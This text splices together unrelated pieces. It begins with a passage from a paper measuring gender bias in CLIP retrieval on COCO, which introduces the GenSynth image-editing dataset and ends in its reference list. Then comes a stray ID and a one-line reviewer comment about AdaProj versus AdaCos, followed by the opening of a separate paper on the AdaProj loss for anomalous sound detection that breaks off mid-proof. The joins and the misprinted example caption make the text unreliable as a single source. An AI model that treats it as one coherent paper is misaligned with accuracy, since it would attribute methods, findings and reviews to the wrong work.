\frac{p_{R_K(q),q,A}}{p_{d,q,A}}, \] where the desired proportion \( p_{d,q,A} \) is the actual attribute distribution over the entire dataset. A disadvantage of Skew@K is that it only measures bias with respect to a single attribute at a time and must be aggregated to give a holistic view of the bias over all attributes. We follow \cite{berg2022bias} and take the maximum Skew@K among all attribute labels \( A \) of the images for a given text query \( q \): \[ \text{MaxSkew@K}(R(q)) = \max_{A_i \in \mathcal{A}} \text{Skew}_{A_i}(R(q)), \] which gives us the “largest unfair advantage” \cite{geyik2019gender} belonging to images within a given attribute. In our work, a MaxSkew@K of 0 for the attribute gender and a given text query \( q \) implies that men and women are equally represented in the retrieved set of \( K \) images \( R_K(q) \). We ignore all images with undefined attribute labels (in this case gender) when measuring MaxSkew@K. COCO is a dataset of 118k images with detection, segmentation and caption annotations, covering 80 distinct categories, including people \cite{chen2015microsoft, lin2014microsoft}. Each image has five captions written by different human annotators. COCO is commonly used to measure gender bias in VLMs in tandem with the Bias@K metric \cite{chuang2023bias,wang2021bias,wang2022bias}. ### 3.2 Gendered Captions and Images in COCO The bias metrics defined in Sec. 3.1 require gender attribute labels for each image and gender-neutral text queries, but these are not naturally present in captioned image data such as COCO. We describe the steps to automatically label gender for images and to neutralise gender information in captions. **Extracting Image Gender Labels from Captions.** We assign a gender label to each COCO image, following prior work \cite{wang2021bias}. For each image, we concatenate all five captions into a single paragraph. If the paragraph contains only feminine words and no masculine words, the image is assigned a female label, and vice versa. If the paragraph contains words from both or neither genders, it is labeled as undefined. The full list of gendered words is detailed in the Appendix. Using this procedure, we implement the function \( g \) in Sec. 3.1. The COCO 2017 train set contains 118,287 images, of which 30,541 (25.8%) are male, 11,781 (9.9%) are female, and 75,965 (64.2%) are undefined. The COCO 2017 validation set contains 5,000 images, of which 1,275 (25.5%), are male, 539 (10.8%) female, and 3,186 (63.7%) undefined. This procedure gives high precision in the gender-pseudo label, as any ambiguous samples are rejected. However, images may be incorrectly labeled as undefined (lower recall) due to, for example, misspelling of the gendered words in the human-annotated captions or omission of rarer gendered terms in our keyword list. **Constructing Gender-Neutral Captions.** We construct gender-neutral captions by replacing gendered words with neutral ones, e.g. “man” or “woman” become “person”, and the sentence “A man sleeping with his cat next to him” becomes “A person sleeping with their car next to them”. The full mapping of gender-neutral words and more examples of original and neutralised captions are in the Appendix. ### 3.3 Identifying Spurious Correlations with Gender As reported above, COCO contains more than twice as many male images as it does female ones. This will inevitably affect retrieval-based bias metrics, as there will be more male images in the retrievals. One naive way to fix this is to undersample the male images in order to arrive at a Balanced COCO dataset. However, ensuring equal distribution of demographic attributes does not necessarily ensure the dataset is unbiased as a whole. Spurious correlations can result in subsets of the data being highly correlated with certain attributes. Here we explore whether for certain contexts in the COCO dataset, e.g., skateboarding, one gender is over-represented. We take two approaches to evidence these spurious correlations. Figure 1: t-SNE clusters ($M = 20$) of gender-neutralised caption embeddings. Each cluster is manually assigned a name, then coloured and labelled according to its male over-representation factor. The male over-representation factor is the difference between the percentage of male images in the particular cluster and the percentage of male images overall in the dataset. **K-means Clusters with Caption Embeddings.** First, we find semantic clusters of captions and evaluate the gender balance within them. For every image $I_n$, we embed its gender-neutralised captions $C^k_n$, where $k = \{1, \ldots, K\}$ represents the $K$ captions of the image, with RoBERTa [Liu et al., 2019] to get features $f^k_n$. We average the features to get $f_n = \frac{1}{K} \sum_{k=1}^{K} f^k_n$. Next, we cluster the features $f_n, n = \{1, \ldots, N\}$ into $M = 20$ clusters with K-Means. Finally, for each cluster, we extract salient words using Latent Dirichlet Allocation (LDA) and give a manually-defined cluster label. In Fig. 1, we show a t-SNE representation of the discovered clusters, together with the degree of male over-representation. We see that in sports-related concepts men are over-represented, whereas in scenes in kitchens, bathrooms, streets, and parks, women are over-represented. For a comparison of this analysis to a keyword-based analysis, and a list of all discovered classes and salient words according to LDA, please refer to the Appendix. **Spurious Correlations Classifier.** Following [Schwemmer et al., 2020], we investigate the presence of spurious correlations by training classifiers to predict binary gender labels of images and captions where the explicit gender information is removed for both training and testing. Specifically, for the image classifier (ResNet-50) we replace all person bounding boxes with black pixels; and for the caption classifier (BERT-base) we use the gender-neutralised captions. The training and testing data is COCO train and validation defined in Sec. 3.2 but with undefined images dropped. On unseen data, the text-only classifier on gender-neutralised captions achieves 78.0% AUC and the image-only classifier on person-masked images achieves 63.4% AUC. Given that a random chance model achieves 50% AUC and an image classifier on unmasked images achieves 71.9% AUC, it is clear that spurious correlations in the image, as well as biases in the caption, provide a significant signal to predict gender of the person in the image even when there is no explicit gender information. ### 3.4 THE EFFECT OF DATASET BIAS ON MODEL BIAS MEASUREMENT There are two angles to dataset bias: (1) over representation – there are more photos of men than women in COCO on average, and (2) spurious correlations, i.e., some environments/backgrounds are more prevalent for specific gender groups. Accordingly, the dataset used for bias evaluation significantly affects the model bias measurement. This is exemplified by a theoretically gender-agnostic model, which we instantiate as a TF-IDF (Term Frequency - Inverse Document Frequency) ranking model for caption-to-caption retrieval on gender-neutralised captions. Despite being based on a simple numerical statistic of word occurrences, devoid of any inherent gender bias, this model still exhibits non-zero bias when evaluated on COCO captions. Our findings, reported in Tab. 1, include Bias@K and MaxSkew@K measurements on COCO Val, compared against a random model and... Table 1: Comparison of model gender bias for CLIP [Radford et al., (2021)], a theoretically gender-agnostic model (TF-IDF on non-gendered words) and a random model, on the COCO validation set under unbalanced and balanced (with standard deviation computed over 5 runs) settings. | Model | COCO Val | COCO Val (Balanced) | |------------------------|----------|---------------------| | | Bias@K | MaxSkew@K | Bias@K | MaxSkew@K | | | K=5 | K=10 | K=5 | K=10 | | Random Model | 0.37 | 0.40 | 0.15 | 0.06 | | TF-IDF_gender−agnostic | 0.22 | 0.24 | 0.29 | 0.22 | | CLIP | 0.20 | 0.23 | 0.28 | 0.23 | CLIP. For Balanced COCO Val, all models register an approximate Bias@K of zero, a consequence of the metric’s signed nature that tends to average towards zero over many directions of spurious correlations on biased but balanced data. Yet, for unbalanced data, Bias@K shifts towards the over-represented attribute in the dataset, making it an unsuitable metric for model bias measurement, as it reflects dataset bias instead. MaxSkew@K, despite being an absolute measure, is not exempt from these issues. It still records large values for the theoretically gender-agnostic model and the random model, suggesting that the established framework may be inadequate for bias measurement on natural image datasets that inherently possess their own biases. The experiments in Tab.1 show the inadequacy of Bias@K and MaxSkew@K for measuring bias on natural image datasets that are imbalanced. Even when correcting for the imbalance issue, spurious correlations remain in the data. Therefore, we argue that a balanced unbiased dataset is required to robustly measure bias and compare different pre-trained models and debiasing strategies. This motivated us to propose GenSynth in Sec.4 which attempts to fix both issues. 4 GenSynth: A Synthetic Gender-Balanced Dataset Using Contrast Sets Given the limitations of measuring Bias@K and MaxSkew@K on natural images and the spurious correlations in existing datasets, we propose a framework for editing natural images into synthetic contrast sets that remove spurious background correlations along the attribute of interest and apply the pipeline on COCO to obtain the GenSynth dataset (see Fig.2). We first synthetically edit the person in images to cover both gender labels with fixed background context (Sec.4.1), followed by automatic filtering that ensures the quality and correctness of the edited persons (Sec.4.2). Finally, we verify the quality of the edited images and the filtering method (Sec.4.3). While we implement this for the gender attribute, in practice, our pipeline could be used to generate synthetic contrast sets for other identity attributes, requiring only the availability of person bounding boxes for the images. Figure 2: An overview of our pipeline for dataset debiasing across a target attribute, in this case gender, ensuring equal demographic representation. A source image containing a person is given as input to InstructPix2Pix along with instructions to synthesise each attribute label. The resulting edits are filtered for quality via K-Nearest Neighbour (KNN) thresholding to ensure realistic-looking edits for each attribute label (male and female). 4.1 Synthetically Editing Images Leveraging advancements in text-conditioned image generation and editing, we use an instruction-based model, InstructPix2Pix \cite{brooks2022instructpix2pix}, for editing objects in an image – referred to as the source image – while keeping the background unchanged. We edit source images from COCO that (i) contain only one person, inferred from the number of person bounding boxes; and (ii) have a defined gender label, as defined in Sec. 3.2. These restrictions remove ambiguity. Next, we crop the image to the single person bounding box and feed it to InstructPix2Pix \cite{brooks2022instructpix2pix} along with multiple edit instructions for each attribute label, e.g., “make this person more masculine/feminine”. Refer to Tab. 7 for the complete set of edit instruction templates. The edited person is then replaced in the source image. By only editing the appearance of the person in the image, we preserve the background content and minimize distortion – empirically, we found editing the entire source image rather than just the source person produced lower quality edits with significant hallucination. For further implementation details, refer to the Appendix. 4.2 Automatic Quality Filtering of Edited Images The synthetic edits with InstructPix2Pix \cite{brooks2022instructpix2pix} can often be of low quality or fail to edit the source person’s attribute into the target attribute. In order to ensure the quality and gender accuracy of our synthetic image sets, we introduce an automatic filtering method using K-Nearest Neighbor (KNN), similar to \cite{gu2020gan} who use KNN to score GAN-generated images. First, we embed a collection of (i) source person bounding boxes, denoted as \( R = \{ r_1, r_2, ..., r_n \} \), and (ii) synthetically-edited person bounding boxes, denoted as \( S = \{ s_1, s_2, ..., s_m \} \) using CLIP. For each synthetic box \( s_i \), we identify its K-nearest neighbors in this feature space, denoted as \( N_{s_i} = \text{KNN}(s_i, R \cup S) \) using the Euclidean distance between the embeddings. If the proportion of real images within \( N_{s_i} \), denoted as \( P_R(s_i) \), and the proportion of images with the target gender of \( s_i \), denoted as \( P_G(s_i) \), exceed the thresholds \( \tau_R \) and \( \tau_G \) respectively, the edited image \( s_i \) is accepted: \[ P_R(s_i) = \frac{1}{K} \sum_{r \in N_{s_i}} 1(r \in R) \quad \text{and} \quad P_G(s_i) = \frac{1}{K} \sum_{r \in N_{s_i}} 1(\text{gender}(r) = \text{gender}(s_i)), \] \[ \text{accept}(s_i) = \begin{cases} 1 & \text{if } P_R(s_i) > \tau_R \text{ and } P_G(s_i) > \tau_G \\ 0 & \text{otherwise}. \end{cases} \] This process ensures that the accepted images are of high quality and accurately reflect the target gender change. We only retain images where the entire set of edits per unique COCO ID has at least one accepted male and female edit, then randomly select one edit for each gender from images that pass the filter. For examples of edits at each decile of \( \tau_R \), see the Appendix. 4.3 Verifying the Quality of GenSynth We evaluate the quality of the GenSynth dataset in three ways. First, we perform a human evaluation study where two annotators each assessed the perceived gender of 100 GenSynth images and 100 corresponding original COCO images. The results affirm our pipeline’s successful gender-targeted editing, with high human agreement. Further details can be found in the Appendix. Second, we automatically measure the correctness of the targeted gender edit, by using CLIP to zero-shot classify the gender of people in the images. Third, to evaluate the semantic similarity of the edited image to the caption, we measure the text-to-image retrieval performance of CLIP on the synthetic text-image captions. For this, we edit the captions using the reverse procedure in Sec. 3.2 to reflect the gender of the person in the edited image. Then, for each image \( I_i \) in GenSynth, where \( i \in \{ 1, 2, \ldots, N \} \), we have a set of \( n \) captions \( C^j_i, j \in \{ 1, 2, \ldots, n \} \). For each caption \( C^j_i \), we perform a retrieval operation from the COCO validation set combined with the query image \( I_i \), to find a set of \( K \) images that most closely match the caption, according to Euclidean distance of CLIP features. We denote this retrieved set as \( R^j_i(K) \). The retrieval performance is evaluated using Recall at \( K \) (\( R@K \)), which is defined as \[ R@K = \frac{1}{Nn} \sum_{i=1}^{N} \sum_{j=1}^{n} 1(I_i \in R^j_i(K)). \] We compare GenSynth, against (i) the original COCO 2017 dataset (train set) of natural images containing persons; and (ii) a weak gender-editing baseline – GenSwap. This baseline has the same Table 2: Dataset comparison between the original COCO dataset of natural person images and synthetically edited COCO from the \textsc{GenSwap} and \textsc{GenSynth} pipelines. We report the presence of Spurious Background (BG) Correlations, Zero-Shot (ZS) Gender Accuracy, and Text-to-Image Retrieval Recall@K (R@K) amongst COCO Val 5k images using CLIP. \textit{Unfilt.} refers to the synthetic pipeline without automatic quality filtering. | COCO-Person Dataset | # Images | Edits per Image | Spurious BG. Correlations | ZS Gender Acc. (%) ↑ | Text-to-Image Retrieval ↑ | |---------------------|----------|----------------|---------------------------|----------------------|--------------------------| | Original | 11,541 | - | ✓ | 93.6 | 30.9 | | \textsc{GenSwap} | 3,973 | 2 | ✗ | 67.9 | 19.0 | | \textsc{GenSynth} (unfilt.) | 11,541 | 16 | ✗ | 83.9 | 22.4 | | \textsc{GenSynth} | 3,973 | 2 | ✗ | 95.5 | 29.2 | unique COCO images as in \textsc{GenSynth}, but only with edited faces – we replace the detected face in the COCO image with a random face of the target gender from the FairFace dataset [Kärkkäinen & Joo (2021)]. Additional implementations of \textsc{GenSwap} are provided in the Appendix. As shown in Tab. 2, \textsc{GenSynth} leads to very similar zero-shot classification and retrieval results to the original COCO images. The filtering step significantly improves both metrics, successfully removing bad edits. The weak baseline, \textsc{GenSwap}, consistently scores low, showing the importance of an effective editing method. 5 Benchmarking CLIP 5.1 Evaluation Setup We use the following three datasets for evaluation: \textsc{GenSynth} consists of 7,946 images that have been generated and filtered as discussed in Sec. 4. It consists of 3,973 unique COCO images from the train set (62.6% of which were originally male), with a male and female edit for each. \textsc{COCO}_g consists of 3,973 original (unedited) images with the same unique COCO IDs as \textsc{GenSynth}. All images contain a single person, whose gender can be identified from the caption. \textsc{COCO}_g_{Bal} consists of 2,970 unique images from \textsc{COCO}_g, randomly sampled such that there is an equal number of male and female images. We use 5 different random seeds and report average results. We compute MaxSkew@K for CLIP [Radford et al. (2021)] and CLIP-clip [Wang et al. (2021a)], with $m = 100$ clipped dimensions computed on COCO train 2017. We use the ViT-B/32 variant for both models. Refer to Appendix for evaluation with other debiased CLIP-like models. We only report MaxSkew@K, as we showed in Sec. 3.4 that Bias@K is not a suitable measure of model bias due to its signed nature – where for balanced data with spurious correlations it shows close to zero bias due to biases in both directions canceling each other out. 5.2 Results In Tab. 3, we compare the gender bias of the CLIP models for the three datasets defined in Sec. 5.1. We find debiased CLIP (CLIP-clip$_{m=100}$) records substantially lower bias on both unbalanced data (\textsc{COCO}_g) and balanced (\textsc{COCO}_g_{Bal}) data. This is because, as we noted in Sec. 3.4, balanced but biased data still contains spurious correlations related to gender. However, we observe that both models show very similar bias on the balanced and debiased \textsc{GenSynth} data. This almost zero difference in bias is a result in itself – it means that the positive debiasing result on \textsc{COCO}_g_{Bal} and \textsc{COCO}_g are due to dataset bias. Overall, these findings suggest that intrinsic dataset bias, specifically spurious correlations, is artificially skewing the interpretations and comparisons of model bias. This reinforces the need for balanced data with no spurious correlations and shows the utility of our proposed pipeline for dataset debiasing. \footnote{Balanced in respect to gender ratio and debiased in respect to spurious correlations.} Table 3: Comparison of Gender Bias between CLIP-like models on COCO-Person datasets. We report the MaxSkew@K in caption-to-image retrieval of gender-neutralised captions. We compare CLIP [Radford et al., (2021)] and CLIP-clip [Wang et al., (2021a)]. We additionally report zero-shot image classification accuracy on ImageNet1K [Deng et al., (2009)]. | COCO-Person Dataset | Model | Gender Bias ↓ | ImageNet1k Acc. (%) ↑ | |---------------------|-------|---------------|----------------------| | | | MaxSkew@25 | MaxSkew@100 | | COCO$_x$ | CLIP | 0.27 | 0.20 | 63.2 | | | CLIP-clip$_{m=100}$ | 0.23 | 0.16 | 60.1 | | COCO$_xBal$ | CLIP | 0.26 | 0.20 | 63.2 | | | CLIP-clip$_{m=100}$ | 0.22 | 0.15 | 60.1 | | GenSynth | CLIP | 0.23 | 0.18 | 63.2 | | | CLIP-clip$_{m=100}$ | 0.22 | 0.17 | 60.1 | 6 LIMITATIONS AND ETHICAL CONSIDERATIONS Synthetic Shifts. By generating synthetic data, we are creating a new evaluation distribution that does not necessarily represent the real-world distribution of the respective categories. This distribution shift can also be forced in contexts where it does not necessarily make sense to either face swap or make gender edits due to factual histories or biological identity [Blodgett et al., (2021)]. Assumptions of Binary Gender. Our data relies on the binary gender labels from the COCO and FairFace datasets and is necessarily influenced by our respective identities. COCO also presents limitations regarding race, ethnicity, and other sensitive attributes. We acknowledge this approach of using binary gender and making reference to perceived gender based on appearance oversimplifies the complexity of gender identity and biological sex, and risks erasing representation of non-binary people. Despite attempts to mitigate this limitation using terms such as “masculine” and “feminine”, the resulting edits were often unusable (due to existing biases in generative models), necessitating reliance on binary and narrow terms. We advocate for future work that encodes and represents non-binary gender in datasets, and improves generalisation in generative models to non-binary terms. Stacking Biases. Our pipeline may inadvertently introduce biases from the generative model via stereotypical representations of perceived gender, e.g., if “make this person more feminine” over-emphasises pink clothes, or “make this person more masculine” over-emphasises beards. The automatic filtering step also tends to favour images with simple scene arrangements. Some generated images were identified as NSFW, a consequence of training on large-scale internet datasets [Birhane et al., (2021)]. Future work could integrate into our pipeline more capable and fair generative models. 7 CONCLUSION The reliability of reported model biases in VLMs is affected by the interaction between dataset bias and choice of bias metric. In this paper, we demonstrated that naturalistic images from COCO have spurious correlations in image context with gender, which in turn affects how much trust can be placed in commonly-used metrics such as Bias@K: when measuring model bias, we may in fact be measuring dataset bias. To mitigate these problems, we proposed a pipeline for editing open-domain images at scale, creating gender-balanced contrast sets where the semantic content of the image remains the same except the person bounding box. Our method does not require manual auditing or image curation, relying instead on an effective automatic filtering method. Using this synthetically-created contrast set (GenSynth) we found that state-of-the-art CLIP-like models measure similarly on gender bias suggesting that measurements of model gender bias can largely be attributed to spurious model associations with gender (such as scene or background information) rather than gender itself. Through these subsequent angles of investigation, we conclude that only focusing on model bias while ignoring how dataset artefacts affect bias metrics paints an unreliable picture of identity-based bias in VLMs. We hope our work contributes to an ongoing discussion of how to seek improved representation and diversity of identity groups in image-captioning datasets, both now and in the future. REFERENCES Sandhini Agarwal, Gretchen Krueger, Jack Clark, Alec Radford, Jong Wook Kim, and Miles Brundage. Evaluating clip: towards characterization of broader capabilities and downstream implications. *arXiv preprint arXiv:2108.02818*, 2021. Erik Altman. Synthesizing credit card transactions. In *Proceedings of the Second ACM International Conference on AI in Finance*, pp. 1–9, 2021. Yuki M Asano, Christian Rupprecht, Andrew Zisserman, and Andrea Vedaldi. Pass: An imagenet replacement for self-supervised pretraining without humans. 2021. Brian Belgodere, Pierre Dognin, Adam Ivankay, Igor Melnyk, Youssef Mrouch, Aleksandra Mojsilovic, Jiri Navartil, Apoorva Nitsure, Inkit Padhi, Mattia Rigotti, et al. Auditing and generating synthetic data with controllable trust trade-offs. *arXiv preprint arXiv:2304.10819*, 2023. Hugo Berg, Siobhan Mackenzie Hall, Yash Bhalgat, Wonsuk Yang, Hannah Rose Kirk, Aleksandar Shtedritski, and Max Bain. A prompt array keeps the bias away: Debiasing vision-language models with adversarial learning. *arXiv preprint arXiv:2203.11933*, 2022. Karan Bhanot, Miao Qi, John S Erickson, Isabelle Guyon, and Kristin P Bennett. The problem of fairness in synthetic healthcare data. *Entropy*, 23(9):1165, 2021. Abeba Birhane, Vinay Uday Prabhu, and Emmanuel Kahembwe. Multimodal datasets: misogyny, pornography, and malignant stereotypes. *arXiv preprint arXiv:2110.01963*, 2021. Su Lin Blodgett, Gilsinia Lopez, Alexandra Olteanu, Robert Sim, and Hanna Wallach. Stereotyping norwegian salmon: An inventory of pitfalls in fairness benchmark datasets. pp. 1004–1015. Association for Computational Linguistics (ACL), 2021. ISBN 9781954085527. doi: 10.18653/v1/2021.acl-long.81. Tim Brooks, Aleksander Holynski, and Alexei A Efros. Instructpix2pix: Learning to follow image editing instructions. *arXiv preprint arXiv:2211.09800*, 2022. Joy Buolamwini and Timnit Gebru. Gender shades: Intersectional accuracy disparities in commercial gender classification. In *Conference on fairness, accountability and transparency*, pp. 77–91. PMLR, 2018. Aylin Caliskan, Joanna J Bryson, and Arvind Narayanan. Semantics derived automatically from language corpora contain human-like biases. *Science*, 356(6334):183–186, 2017. Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In *Proceedings of the IEEE/CVF international conference on computer vision*, pp. 9650–9660, 2021. Xinlei Chen, Hao Fang, Tsung-Yi Lin, Ramakrishna Vedantam, Saurabh Gupta, Piotr Dollár, and C Lawrence Zitnick. Microsoft coco captions: Data collection and evaluation server. *arXiv preprint arXiv:1504.00325*, 2015. Mehdi Cherti, Romain Beaumont, Ross Wightman, Mitchell Wortsman, Gabriel Ilharco, Cade Gordon, Christoph Schuhmann, Ludwig Schmidt, and Jenia Jitsev. Reproducible scaling laws for contrastive language-image learning. *arXiv preprint arXiv:2212.07143*, 2022. Ching-Yao Chuang, Varun Jampani, Yuanzhen Li, Antonio Torralba, and Stefanie Jegelka. Debiasing vision-language models via biased prompts. *arXiv preprint arXiv:2302.00070*, 2023. Terrance De Vries, Ishan Misra, Changhan Wang, and Laurens Van der Maaten. Does object recognition work for everyone? In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition Workshops*, pp. 52–59, 2019. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE conference on computer vision and pattern recognition*, pp. 248–255. Ieee, 2009.
BBD4cFDKxQ
The justification of this step where rather cryptic and I could not distinguish the argument of AdaProj over AdaCos from arguments for the whole design of centroid-based embeddings for outlier detection.
ADAProj: Adaptively Scaled Angular Margin Subspace Projections for Anomaly Detection with Auxiliary Classification Tasks Anonymous authors Paper under double-blind review Abstract One of the state-of-the-art approaches for semi-supervised anomaly detection is to first learn an embedding space and then estimate the distribution of normal data. This can be done by using one-class losses or by using auxiliary classification tasks based on meta information or self-supervised learning. Angular margin losses are a popular training objective because they increase intra-class similarity and avoid learning trivial solutions by reducing inter-class similarity. In this work, AdaProj a novel loss function that generalizes upon angular margin losses is presented. In contrast to angular margin losses, which project data of each class as close as possible to their corresponding class centers, AdaProj learns to project data onto class-specific subspaces. By doing so, the resulting distributions of embeddings belonging to normal data are not required to be as restrictive as other loss functions allowing a more detailed view on the data. This enables a system to more accurately detect anomalous samples during testing. In experiments conducted on the DCASE2022 and DCASE2023 datasets, it is shown that using AdaProj to learn an embedding space significantly outperforms other commonly used loss functions achieving a new state-of-the-art performance on the DCASE2023 dataset. 1 Introduction Semi-supervised anomaly detection is the task of training a system to differentiate between normal and anomalous data using only normal training samples (Aggarwal [2017]). For many applications, it is much less costly to collect normal data than anomalous samples for training a system because anomalies occur only rarely and intentionally generating them is often costly. Therefore, for these applications a semi-supervised anomaly detection setting is often a realistic assumption. An example application is acoustic machine condition monitoring for predictive maintenance, which is largely promoted through the anomalous sound detection (ASD) tasks of the annual DCASE Challenge (Koizumi et al. [2020], Kawaguchi et al. [2021], Dohi et al. [2022a, 2023]) and will serve as the running example in this work. Here, normal data corresponds to sounds of fully functioning machines whereas anomalous sounds indicate mechanical failure. The goal is to develop a system that detects anomalous recordings using only normal recordings as training data. One of the main difficulties to overcome is that it is practically impossible to record isolated sounds of a target machine. Instead, recordings also contain many other sounds emitted by non-target machines or humans. Compared to this complex acoustic scene, anomalous signal components of the target machines are very subtle and hard to detect without utilizing additional knowledge. Another main difficulty is that a system should also be able to reliably detect anomalous sounds when changing the acoustic conditions or machine settings without needing to collect large amounts of data in this changed conditions or to re-train the system (domain generalization (Wang et al. [2021])). One possibility to simultaneously overcome both difficulties is to learn mapping audio signals into a fixed-dimensional vector space, in which representations belonging to normal and anomalous data, called embeddings, can be easily separated. Then, by estimating the distribution in the embedding space of normal training samples, one can compute an anomaly score for an unseen test sample by computing the likelihood of this sample being normal or simply measuring the distance to normal samples. To train such an embedding model, the state-of-the-art is to utilize an auxiliary classification task using provided meta information or self-supervised learning (SSL). This enables the embedding model to closely monitor target signals and ignore other signals and noise (Wilkinghoff & Kurth, 2023). For machine condition monitoring, possible auxiliary tasks are classifying between machine types (Giri et al., 2020; Lopez et al., 2020; Inoue et al., 2020) or, additionally, between different machine states and noise settings (Venkatesh et al., 2022; Nishida et al., 2022; Deng et al., 2022), recognizing augmented and non-augmented versions of normal data (Giri et al., 2020; Chen et al., 2023) or predicting the activity of machines (Nishida et al., 2022). Using an auxiliary task to learn embeddings is also called outlier exposure (OE) (Hendrycks et al., 2019) because normal samples belonging to other classes than a target class can be considered proxy outliers (Primus et al., 2020). The contributions of this work are the following. First and foremost, AdaProj, a novel angular margin loss function that learns class-specific subspaces for training an embedding model, is presented. Second, it is proven that AdaProj has arbitrarily large optimal solution spaces allowing to relax the compactness requirements of the class-specific distributions in the embedding space. Last but not least, AdaProj is compared to other commonly used loss functions. In experiments conducted on the DCASE2022 and DCASE2023 ASD datasets it is shown that AdaProj outperforms all other loss functions. As a result, a new state-of-the-art performance is achieved on the DCASE2023 dataset. 1.1 Related Work When training a neural network to solve a classification task, usually the softmax function in combination with the categorical cross-entropy (CCE) is used. However, directly training a network this way only reduces inter-class similarity without explicitly reducing intra-class similarity (Wang et al., 2018). When training an embedding model for anomaly detection, high intra-class similarity is a desired property to cluster normal data and be able to detect anomalous samples. To address this issue, losses should also explicitly increase intra-class similarity. There are several loss functions to achieve this. Ruff et al. (2018) proposed a compactness loss to project the data into a hypersphere of minimal volume for one-class classification. However, for machine condition monitoring in noisy conditions it is known that one-class losses perform worse than losses that also discriminatively solve an auxiliary classification task (Wilkinghoff & Kurth, 2023). Perera & Patel (2019) did this by simultaneously using a so-called descriptiveness loss consisting of a CCE on another arbitrary dataset than the target dataset, to be able to learn a better structured embedding space in case no meta information are available on the target dataset. For machine condition monitoring, often meta information is available as it can at least be ensured which machine is being recorded when collecting data. Inoue et al. (2020) used center loss (Wen et al., 2016), which minimizes the distance to learned class centers for each class. Another choice are angular margin losses that learn an embedding space on the unit sphere while ensuring a margin between classes leading to better generalization capabilities than losses that utilize the whole Euclidean space. Specific examples are the additive margin softmax loss (Wang et al., 2018) as used by Lopez et al. (2020, 2021) and ArcFace (Deng et al., 2019) as used by Giri et al. (2020); Kuroyanagi et al. (2021); Deng et al. (2022); Wilkinghoff (2021; 2023a) use the AdaCos loss (Zhang et al., 2019), which essentially is ArcFace with an adaptive scale parameter, or the sub-cluster AdaCos loss (Wilkinghoff, 2021), which utilizes multiple sub-clusters instead of a single one. As stated above, the goal of this work is to further extend these loss functions to learning class-specific linear subspaces to relax the compactness requirements and allow more flexibility for the network when learning to map audio data into an embedding space. There are also other works utilizing losses to learn subspaces based on orthogonal projections to learn embedding spaces for other applications in different ways. Yu et al. (2021) used orthogonal projections as a constraint for training an autoencoder based anomaly detection system. Another example is semi-supervised image classification by using a combination of class-specific subspace projections with a reconstructions loss and ensure that they are different by also using a discriminative loss (Li et al., 2022). Our work focuses on learning an embedding space through an auxiliary classification task that is well-suited for semi-supervised anomaly detection. --- 1 The source code will be made available after the review process to not reveal the identity of the authors. 2 METHODOLOGY 2.1 NOTATION Let \( \phi : X \to \mathbb{R}^D \) denote a neural network where \( X \) denotes some input space, which consists of audio signals in this work, and \( D \in \mathbb{N} \) denotes the dimension of the embedding space. Define the linear projection of \( x \in \mathbb{R}^D \) onto the subspace \( \text{span}(C_k) \subset \mathbb{R}^D \) as \( P_{\text{span}(C_k)}(x) := \sum_{c_k \in C_k} \langle x, c_k \rangle c_k \). Furthermore, let \( S^{D-1} = \{ y \in \mathbb{R}^D : \|y\|_2 = 1 \} \subset \mathbb{R}^D \) denote the \( D \)-sphere and define \( P_{S^{D-1}}(x) := \frac{x}{\|x\|_2} \in S^{D-1} \) to be the projection onto the \( D \)-sphere. 2.2 ADAProj LOSS FUNCTION Similar to the sub-cluster AdaCos loss (Wilkinghoff, 2021), the idea of the AdaProj loss is to enlarge the space of optimal solutions to allow the network to learn less restrictive distributions of the normal samples. This may help to differentiate between normal and anomalous data after training. The reason is that for some auxiliary classes a strong compactness may be detrimental when aiming to learn an embedding space that separates normal and anomalous data since both may be mapped onto the same compact distribution making it impossible to distinguish them. This relaxation is achieved by measuring the distance to class-specific subspaces while training the embedding model instead of measuring the distance to a single or multiple centers as done for other angular margin losses. Formally, the definition of the AdaProj loss is as follows. **Definition 1** (AdaProj loss). Let \( C_k \subset \mathbb{R}^D \) with \( |C_k| = J \in \mathbb{N} \) denote class centers for class \( k \in \{1, \ldots, N_{\text{classes}}\} \). Then for the AdaProj loss the logit for class \( k \in \{1, \ldots, N_{\text{classes}}\} \) is defined as \[ L(x, C_k) := \hat{s} \cdot \|P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C_k)}(x))\|_2^2 \] where \( \hat{s} \in \mathbb{R}_+ \) is the so-called dynamically adaptive scale parameter of the AdaCos loss (Zhang et al., 2019). Inserting these logits into a softmax function and computing the CCE yields the AdaProj loss function. **Remark.** Note that, by Lemma 5 of Wilkinghoff & Kurth (2023), it holds that \[ \|P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C_k)}(x))\|_2^2 = 2(1 - \langle P_{S^{D-1}}(x), P_{S^{D-1}}(P_{\text{span}(C_k)}(x)) \rangle), \] which is equal to the cosine distance in this case. This explains why the AdaProj loss can be called an angular margin loss. As for other angular margin losses, projecting the embedding space onto the \( D \)-sphere has several advantages (Wilkinghoff & Kurth, 2023). Most importantly, if \( D \) is sufficiently large randomly initialized centers are with very high probability approximately orthonormal to each other (Gorban et al., 2016), i.e. distributed equidistantly, and sufficiently far away from \( 0 \in \mathbb{R}^D \). Therefore, one does not need to carefully design a method to initialize the centers. Another advantage is that a normalization may prevent numerical issues, similar to applying batch normalization (Ioffe & Szegedy, 2015). The following Lemma shows that using the AdaProj loss, as defined above, indeed allows the network to utilize a larger solution space. **Lemma 2.** Let \( x \in \mathbb{R}^D \) and let \( C \subset \mathbb{R}^D \) contain pairwise orthonormal elements. Then, \[ x \in \text{span}(C) \cap S^{D-1} \Rightarrow \|P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C)}(x))\|_2^2 = 0. \] **Proof.** Let \( x \in \text{span}(C) \cap S^{D-1} \subset \mathbb{R}^D \) with \( |C| = J \). Therefore, \( \|x\|_2 = 1 \) and there are \( \lambda_j \in \mathbb{R} \) with \( x = \sum_{j=1}^{J} \lambda_j c_j \). Thus, it holds that \[ x = \sum_{j=1}^{J} \lambda_j c_j = \sum_{j=1}^{J} \sum_{i=1}^{J} \lambda_i \langle c_i, c_j \rangle c_j = \sum_{j=1}^{J} (\sum_{i=1}^{J} \lambda_i \langle c_i, c_j \rangle) c_j = 